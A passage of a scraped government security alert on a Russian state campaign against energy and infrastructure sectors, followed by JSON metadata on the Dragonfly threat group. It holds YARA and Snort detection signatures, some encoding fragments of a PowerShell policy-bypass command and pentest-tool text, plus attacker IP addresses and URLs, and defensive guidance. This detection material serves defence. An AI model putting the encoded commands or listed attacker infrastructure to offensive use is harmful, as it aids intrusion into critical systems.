22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }\r\n            $s14 = {\r\n68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E\r\n}\r\n            $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }\r\n//inveigh pentesting tools\r\n            $s16 = {\r\n24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65\r\n}\r\n//specific malicious word document PK archive\r\n            $s17 = {\r\n2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B\r\n}\r\n            $s18 = {\r\n6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4\r\n}\r\n            $s19 = {\r\n8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39\r\n}\r\n            $s20 = {\r\n8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4\r\n}\r\n            $s21 = {\r\n8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4\r\n}\r\n            $s22 = \"5.153.58.45\"\r\n            $s23 = \"62.8.193.206\"\r\n            $s24 = \"/1/ree_stat/p\"\r\n            $s25 = \"/icon.png\"\r\n            $s26 = \"/pshare1/icon\"\r\n            $s27 = \"/notepad.png\"\r\n            $s28 = \"/pic.png\"\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 10 of 15\n\n$s29 = \"http://bit.ly/2m0x8IH\"\r\ncondition:\r\n            ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or\r\n($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or\r\n$s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)\r\n}\r\nrule APT_malware_2\r\n{\r\nmeta:\r\n      description = \"rule detects malware\"\r\n      author = \"other\"\r\nstrings:\r\n      $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }\r\n      $http_push = \"X-mode: push\" nocase\r\n      $http_pop = \"X-mode: pop\" nocase\r\ncondition:\r\n      any of them\r\n}\r\nrule Query_XML_Code_MAL_DOC_PT_2\r\n{\r\nmeta:\r\n     name= \"Query_XML_Code_MAL_DOC_PT_2\"\r\n     author = \"other\"\r\nstrings:\r\n            $zip_magic = { 50 4b 03 04 }\r\n            $dir1 = \"word/_rels/settings.xml.rels\"\r\n            $bytes = {8c 90 cd 4e eb 30 10 85 d7}\r\ncondition:\r\n            $zip_magic at 0 and $dir1 and $bytes\r\n}\r\nrule Query_Javascript_Decode_Function\r\n{\r\nmeta:\r\n      name= \"Query_Javascript_Decode_Function\"\r\n      author = \"other\"\r\nstrings:\r\n      $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22\r\n29 3B}\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 11 of 15\n\n$decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66\r\n67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64\r\n65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}\r\n      $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26\r\n33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21\r\n3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}\r\n      $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}\r\n      $func_call=\"a(\\\"\"\r\ncondition:\r\n      filesize \u003c 20KB and #func_call \u003e 20 and all of ($decode*)\r\n}\r\nrule Query_XML_Code_MAL_DOC\r\n{\r\nmeta:\r\n      name= \"Query_XML_Code_MAL_DOC\"\r\n      author = \"other\"\r\nstrings:\r\n      $zip_magic = { 50 4b 03 04 }\r\n      $dir = \"word/_rels/\" ascii\r\n      $dir2 = \"word/theme/theme1.xml\" ascii\r\n      $style = \"word/styles.xml\" ascii\r\ncondition:\r\n      $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd\r\n}\r\nrule z_webshell\r\n{\r\nmeta:\r\n            description = \"Detection for the z_webshell\"\r\n            author = \"DHS NCCIC Hunt and Incident Response Team\"\r\n            date = \"2018/01/25\"\r\n            md5 =  \"2C9095C965A55EFC46E16B86F9B7D6C6\"\r\nstrings:\r\n            $aspx_identifier1 = \"\u003c%@ \" nocase ascii wide\r\n            $aspx_identifier2 = \"\u003casp:\" nocase ascii wide\r\n            $script_import = /(import|assembly) Name(space)?\\=\\\"(System|Microsoft)/ nocase ascii wide\r\n            $case_string = /case \\\"z_(dir|file|FM|sql)_/ nocase ascii wide\r\n            $webshell_name = \"public string z_progname =\" nocase ascii wide\r\n            $webshell_password = \"public string Password =\" nocase ascii wide\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 12 of 15\n\ncondition:\r\n            1 of ($aspx_identifier*)\r\n            and #script_import \u003e 10\r\n            and #case_string \u003e 7\r\n            and 2 of ($webshell_*)\r\n            and filesize \u003c 100KB\r\n}\r\nImpact\r\nThis actors’ campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical\r\nmanufacturing sectors.\r\nSolution\r\nDHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help\r\ndefend against this activity.\r\nNetwork and Host-based Signatures\r\nDHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and\r\nSnort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their\r\norganization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious\r\nactivity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated\r\nYARA and .txt file to identify malicious activity.\r\nDetections and Prevention Measures\r\nUsers and administrators may detect spear phishing, watering hole, web shell, and remote access activity by\r\ncomparing all IP addresses and domain names listed in the IOC packages to the following locations:\r\nnetwork intrusion detection system/network intrusion protection system logs,\r\nweb content logs,\r\nproxy server logs,\r\ndomain name server resolution logs,\r\npacket capture (PCAP) repositories,\r\nfirewall logs,\r\nworkstation Internet browsing history logs,\r\nhost-based intrusion detection system /host-based intrusion prevention system (HIPS) logs,\r\ndata loss prevention logs,\r\nexchange server logs,\r\nuser mailboxes,\r\nmail filter logs,\r\nmail content logs,\r\nAV mail logs,\r\nOWA logs,\r\nBlackberry Enterprise Server logs, and\r\nMobile Device Management logs.\r\nTo detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes\r\nlisted in the IOC packages with the following locations:\r\napplication logs,\r\nIIS/Apache logs,\r\nfile system,\r\nintrusion detection system/ intrusion prevention system logs,\r\nPCAP repositories,\r\nfirewall logs, and\r\nreverse proxy.\r\nDetect spear-phishing by searching workstation file systems and network-based user directories, for attachment\r\nfilenames and hashes found in the IOC packages.\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 13 of 15\n\nDetect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.\r\nDetect evasion techniques by the actors by identifying deleted logs. This can be done by reviewing last-seen entries\r\nand by searching for event 104 on Windows system logs.\r\nDetect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially\r\nthose created recently.\r\nDetect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for\r\nall users. Any unusual login times should be reviewed by the account owners.\r\nDetect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s\r\ncredentials suspected to be compromised.\r\nDetect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.\r\nDetect spear-phishing through a network by validating all new email accounts created on mail servers, especially\r\nthose with external user access.\r\nDetect persistence on servers by searching system logs for all filenames listed in the IOC packages.\r\nDetect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1”\r\ncontained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior\r\nto the activity.)\r\nDetect persistence by reviewing all installed applications on critical systems for unauthorized applications,\r\nspecifically note FortiClient VPN and Python 2.7.\r\nDetect persistence by searching for the value of “REG_DWORD 100” at registry location\r\n“HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal”. Services\\MaxInstanceCount” and the value of\r\n“REG_DWORD 1” at location\r\n“HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\dontdisplaylastusername”.\r\nDetect installation by searching all proxy logs for downloads from URIs without domain names.\r\nGeneral Best Practices Applicable to this Campaign:\r\nPrevent external communication of all versions of SMB and related protocols at the network boundary by blocking\r\nTCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best\r\nPractices for more information.\r\nBlock the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the\r\nnetwork.\r\nMonitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple\r\nconcurrent logins).\r\nDeploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources,\r\nand addresses; block these before receiving and downloading messages. This action will help to reduce the attack\r\nsurface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at\r\nthe mail gateway) with a reputable anti-virus solution that includes cloud reputation services.\r\nSegment any critical networks or control systems from business systems and networks according to industry best\r\npractices.\r\nEnsure adequate logging and visibility on ingress and egress points.\r\nEnsure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide\r\nadequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging,\r\nscript block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and\r\nanalysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.\r\nImplement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A –\r\nCompromised Web Servers and Web Shells – Threat Awareness and Guidance.\r\nEstablish a training mechanism to inform end users on proper email and web usage, highlighting current information\r\nand analysis, and including common indicators of phishing. End users should have clear instructions on how to report\r\nunusual or suspicious emails.\r\nImplement application directory whitelisting. System administrators may implement application or application\r\ndirectory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults\r\nallow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software\r\nfolders. All other locations should be disallowed unless an exception is granted.\r\nBlock RDP connections originating from untrusted external addresses unless an exception exists; routinely review\r\nexceptions on a regular basis for validity.\r\nStore system logs of mission critical systems for at least one year within a security information event management\r\ntool.\r\nEnsure applications are configured to log the proper level of detail for an incident response investigation.\r\nConsider implementing HIPS or other controls to prevent unauthorized code execution.\r\nEstablish least-privilege controls.\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 14 of 15\n\nReduce the number of Active Directory domain and enterprise administrator accounts.\r\nBased on the suspected level of compromise, reset all user, administrator, and service account credentials across all\r\nlocal and domain systems.\r\nEstablish a password policy to require complex passwords for all users.\r\nEnsure that accounts for network administration do not have external connectivity.\r\nEnsure that network administrators use non-privileged accounts for email and Internet access.\r\nUse two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and\r\nhigh-risk environments (e.g., remote access, privileged access, and access to sensitive data).\r\nImplement a process for logging and auditing activities conducted by privileged accounts.\r\nEnable logging and alerting on privilege escalations and role changes.\r\nPeriodically conduct searches of publically available information to ensure no sensitive information has been\r\ndisclosed. Review photographs and documents for sensitive data that may have inadvertently been included.\r\nAssign sufficient personnel to review logs, including records of alerts.\r\nComplete independent security (as opposed to compliance) risk review.\r\nCreate and participate in information sharing programs.\r\nCreate and maintain network and system documentation to aid in timely incident response. Documentation should\r\ninclude network diagrams, asset owners, type of asset, and an incident response plan.\r\nReport Notice\r\nDHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to\r\nDHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at\r\nNCCICcustomerservice@hq.dhs.gov or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber\r\nDivision (CyWatch@fbi.gov or 855-292-3937).\r\nReferences\r\n[1] Symantec. Dragonfly: Western energy sector targeted by sophisticated attack group. September 6, 2017.\r\n[2] CERT CC. Vulnerability Note #672268\r\nRevisions\r\nMarch 15, 2018: Initial Version\r\nSource: https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 15 of 15\n\n_________________________________________ alert tcp any any -\u003e any 445 (msg:\"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)\";\nsid:42000003; rev:1; flow:established,to_server; content:\"|FF|SMB|75 00 00 00 00|\"; offset:4; depth:9; content:\"|08 00 01\n Page 8 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors" ], "report_names": [ "russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors" ], "threat_actors": [ { "id": "649b5b3e-b16e-44db-91bc-ae80b825050e", "created_at": "2022-10-25T15:50:23.290412Z", "updated_at": "2026-04-10T02:00:05.257022Z", "deleted_at": null, "main_name": "Dragonfly", "aliases": [ "TEMP.Isotope", "DYMALLOY", "Berserk Bear", "TG-4192", "Crouching Yeti", "IRON LIBERTY", "Energetic Bear", "Ghost Blizzard" ], "source_name": "MITRE:Dragonfly", "tools": [ "MCMD", "Impacket", "CrackMapExec", "Backdoor.Oldrea", "Mimikatz", "PsExec", "Trojan.Karagany", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "90307967-d5eb-4b7b-b8de-6fa2089a176e", "created_at": "2022-10-25T15:50:23.501119Z", "updated_at": "2026-04-10T02:00:05.347826Z", "deleted_at": null, "main_name": "Dragonfly 2.0", "aliases": [ "Dragonfly 2.0", "IRON LIBERTY", "DYMALLOY", "Berserk Bear" ], "source_name": "MITRE:Dragonfly 2.0", "tools": [ "netsh", "Impacket", "MCMD", "CrackMapExec", "Trojan.Karagany", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "1a76ed30-4daf-4817-98ae-87c667364464", "created_at": "2022-10-25T16:47:55.891029Z", "updated_at": "2026-04-10T02:00:03.646466Z", "deleted_at": null, "main_name": "IRON LIBERTY", "aliases": [ "ALLANITE ", "ATK6 ", "BROMINE ", "CASTLE ", "Crouching Yeti ", "DYMALLOY ", "Dragonfly ", "Energetic Bear / Berserk Bear ", "Ghost Blizzard ", "TEMP.Isotope ", "TG-4192 " ], "source_name": "Secureworks:IRON LIBERTY", "tools": [ "ClientX", "Ddex Loader", "Havex", "Karagany", "Loek", "MCMD", "Sysmain", "xfrost" ], "source_id": "Secureworks", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "e2a4bc0b-6745-4e55-9d7c-3d169d70b025", "created_at": "2022-10-25T16:07:23.386907Z", "updated_at": "2026-04-10T02:00:04.576815Z", "deleted_at": null, "main_name": "Berserk Bear", "aliases": [ "Berserk Bear", "Dragonfly 2.0", "Dymalloy", "G0074" ], "source_name": "ETDA:Berserk Bear", "tools": [ "Fuerboos", "Goodor", "Impacket", "Karagany", "Karagny", "LOLBAS", "LOLBins", "Living off the Land", "Phishery", "Trojan.Karagany", "Trojan.Phisherly", "xFrost" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434819, "ts_updated_at": 1775792184, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/08b57e20c50b48753f3f067341d566a8a7b90304.pdf", "text": "https://archive.orkl.eu/08b57e20c50b48753f3f067341d566a8a7b90304.txt", "img": "https://archive.orkl.eu/08b57e20c50b48753f3f067341d566a8a7b90304.jpg" } }